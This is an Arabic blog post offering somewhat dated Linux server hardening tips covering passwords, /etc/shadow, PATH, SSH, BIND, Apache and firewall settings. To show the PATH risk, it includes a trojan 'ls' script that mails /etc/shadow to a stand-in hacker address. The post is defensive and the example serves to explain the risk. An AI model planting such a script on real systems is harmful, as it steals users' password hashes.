نصائح أمان لنظام التشغيل Linux (الخادم) (الجزء الأول)

لم أنشر أي شيء على المدونة منذ فترة طويلة وأود أن أشارككم بعض النصائح المأخوذة من كتاب (من بين أمور أخرى). لقد وجدتها في الجامعة وقرأت للتو ، وعلى الرغم من أنها بصراحة قديمة بعض الشيء ومن غير المرجح أن تعمل التقنيات الموضحة نظرًا لتطور النظام ، فهي أيضًا جوانب مثيرة للاهتمام يمكن عرضها.9788448140502

أريد أن أوضح أنها موجهة نحو نظام Linux الذي يتم استخدامه كخادم ، على نطاق متوسط ​​أو ربما على نطاق واسع نظرًا لأنه على مستوى مستخدم سطح المكتب ، على الرغم من إمكانية تطبيقها ، إلا أنها لن تكون مفيدة للغاية.

ألاحظ أيضًا أنها نصائح سريعة بسيطة ولن أخوض في الكثير من التفاصيل ، على الرغم من أنني أخطط للقيام بنشر آخر أكثر تحديدًا وشمولاً حول موضوع معين. لكني سأرى ذلك لاحقًا. هيا بنا نبدأ.

سياسات كلمة المرور. 

على الرغم من أنها تبدو كعبارة مشهورة ، إلا أن وجود سياسة كلمة مرور جيدة يصنع الفرق بين نظام ضعيف أم لا. الهجمات مثل "القوة الغاشمة" تستفيد من وجود كلمة مرور سيئة للوصول إلى النظام. النصائح الأكثر شيوعًا هي:

  • اجمع بين الأحرف الكبيرة والصغيرة.
  • استخدم أحرفًا خاصة.
  • أعداد.
  • أكثر من 6 أرقام (نأمل أكثر من 8).

بالإضافة إلى ذلك ، دعنا نفكر في ملفين أساسيين.  / etc / passwd و / etc / shadow.

شيء مهم جدا هو أن الملف / etc / passwd. بالإضافة إلى إعطائنا اسم المستخدم ، معرفه ، مسار المجلد ، bash .. إلخ. في بعض الحالات ، يُظهر أيضًا مفتاح المستخدم المشفر.

 دعونا نلقي نظرة على تركيبته النموذجية.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

المستخدم: cryptkey: uid: gid: path :: path: bash

المشكلة الحقيقية هنا هي أن هذا الملف بالذات لديه أذونات -rw-r - r– مما يعني أنه لديه أذونات قراءة لأي مستخدم على النظام. وامتلاك المفتاح المشفر ليس من الصعب جدًا فك تشفير المفتاح الحقيقي.

لهذا الملف موجود / الخ / الظل. هذا هو الملف حيث يتم تخزين جميع مفاتيح المستخدم ، من بين أشياء أخرى. يحتوي هذا الملف على الأذونات اللازمة حتى لا يتمكن أي مستخدم من قراءته.

لإصلاح ذلك ، يجب أن نذهب إلى الملف / الخ / باسود وتغيير المفتاح المشفر إلى "x" ، سيؤدي ذلك إلى حفظ المفتاح في ملفنا فقط / الخ / الظل.

desdelinux:x:500:501::/home/usuario1:/bin/bash

مشاكل مع PATH و. bashrc وغيرها.

عندما ينفذ المستخدم أمرًا على وحدة التحكم الخاصة به ، يبحث shell عن هذا الأمر في قائمة الدليل المضمنة في متغير بيئة PATH.

إذا قمت بكتابة "echo $ PATH" في وحدة التحكم ، فسيتم إخراج شيء مثل هذا.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

كل مجلد من هذه المجلدات هو المكان الذي سيبحث فيه الغلاف عن الأمر المكتوب لتنفيذه. هو ". هذا يعني أن المجلد الأول المطلوب البحث فيه هو نفس المجلد الذي يتم تنفيذ الأمر منه.

افترض أن هناك مستخدم "كارلوس" وهذا المستخدم يريد "فعل الشر". يمكن لهذا المستخدم ترك ملف يسمى "ls" في مجلده الرئيسي ، وفي هذا الملف تنفيذ أمر مثل:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

وإذا كان المستخدم الجذر لأشياء من الوجهة ، يحاول سرد المجلدات داخل مجلد carlos (حيث أنه يبحث أولاً عن الأمر في نفس المجلد ، فإنه سيرسل عن غير قصد الملف بكلمات المرور إلى هذا البريد الإلكتروني ثم يتم سرد المجلدات ولن يكتشف ذلك حتى وقت متأخر جدًا.

لتجنب ذلك يجب علينا القضاء على "." من المتغير PATH.

بنفس الطريقة ، يجب تدقيق ملفات مثل /.bashrc و /.bashrc_profile و ./.login والتحقق من عدم وجود "." في المتغير PATH ، وفي الواقع من ملفات مثل هذا ، يمكنك تغيير وجهة أمر معين.

نصائح مع الخدمات:

SHH

  • قم بتعطيل الإصدار 1 من بروتوكول ssh في ملف sshd_config.
  • لا تسمح للمستخدم الجذر بتسجيل الدخول عن طريق ssh.
  • يجب قراءة الملفات والمجلدات ssh_host_key و ssh_host_dsa_key و ssh_host_rsa_key بواسطة المستخدم الجذر فقط.

ربط

  • قم بتغيير رسالة الترحيب في ملف named.conf بحيث لا تُظهر رقم الإصدار
  • حدد عمليات النقل في المنطقة ، وقم بتمكينها فقط للفرق التي تحتاجها.

أباتشي

  • منع الخدمة من عرض إصدارك في رسالة الترحيب. قم بتحرير ملف httpd.conf وإضافة أو تعديل الأسطر:  

ServerSignature Off
ServerTokens Prod

  • تعطيل الفهرسة التلقائية
  • قم بتكوين apache بحيث لا يخدم الملفات الحساسة مثل .htacces و * .inc و * .jsp .. إلخ
  • إزالة صفحات الرجل أو عينة من الخدمة
  • قم بتشغيل اباتشي في بيئة جذر

أمن الشبكة.

من الضروري تغطية جميع الإدخالات المحتملة إلى نظامك من الشبكة الخارجية ، وإليك بعض النصائح الأساسية لمنع المتطفلين من المسح والحصول على المعلومات من شبكتك.

منع حركة مرور ICMP

يجب تكوين جدار الحماية بحيث يحظر جميع أنواع حركة مرور ICMP الواردة والصادرة واستجابات الارتداد. بهذا تتجنب ذلك ، على سبيل المثال ، يقوم ماسح ضوئي يبحث عن معدات مباشرة في نطاق IP بتحديد موقعك. 

تجنب فحص TCP ping.

طريقة واحدة لفحص النظام الخاص بك هي فحص TCP ping. لنفترض أنه يوجد على الخادم الخاص بك خادم Apache على المنفذ 80. يمكن للدخيل إرسال طلب ACK إلى هذا المنفذ ، وبهذا ، إذا استجاب النظام ، فسيكون الكمبيوتر على قيد الحياة وسيفحص بقية المنافذ.

لهذا ، يجب أن يحتوي جدار الحماية الخاص بك دائمًا على خيار "وعي الحالة" ويجب أن يتجاهل جميع حزم ACK التي لا تتوافق مع اتصال أو جلسة TCP تم إنشاؤها بالفعل.

بعض النصائح الإضافية:

  • استخدم أنظمة IDS لاكتشاف عمليات فحص المنافذ لشبكتك.
  • قم بتكوين جدار الحماية بحيث لا يثق في إعدادات منفذ مصدر الاتصال.

هذا لأن بعض عمليات الفحص تستخدم منفذ مصدر "وهمي" مثل 20 أو 53 ، حيث أن العديد من الأنظمة تثق بهذه المنافذ لأنها نموذجية لبروتوكول نقل الملفات أو DNS.

ملاحظة: تذكر أن معظم المشكلات المشار إليها في هذا المنشور قد تم حلها بالفعل في جميع التوزيعات الحالية تقريبًا. لكن ليس من المؤلم أبدًا الحصول على معلومات أساسية حول هذه المضايقات حتى لا تحدث لك.

ملاحظة: سأرى لاحقًا موضوعًا محددًا وسأقوم بنشر مشاركة تحتوي على معلومات أكثر تفصيلاً وحديثة.

Thaks الجميع للقراءة.

تحية.


تعليق ، اترك لك

اترك تعليقك

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها ب *

*

*

  1. المسؤول عن البيانات: ميغيل أنخيل جاتون
  2. الغرض من البيانات: التحكم في الرسائل الاقتحامية ، وإدارة التعليقات.
  3. الشرعية: موافقتك
  4. توصيل البيانات: لن يتم إرسال البيانات إلى أطراف ثالثة إلا بموجب التزام قانوني.
  5. تخزين البيانات: قاعدة البيانات التي تستضيفها شركة Occentus Networks (الاتحاد الأوروبي)
  6. الحقوق: يمكنك في أي وقت تقييد معلوماتك واستعادتها وحذفها.

  1.   المعلوماتية قال

    أعجبتني المقالة حقًا وأهتم بالموضوع ، وأشجعك على الاستمرار في تحميل المحتوى.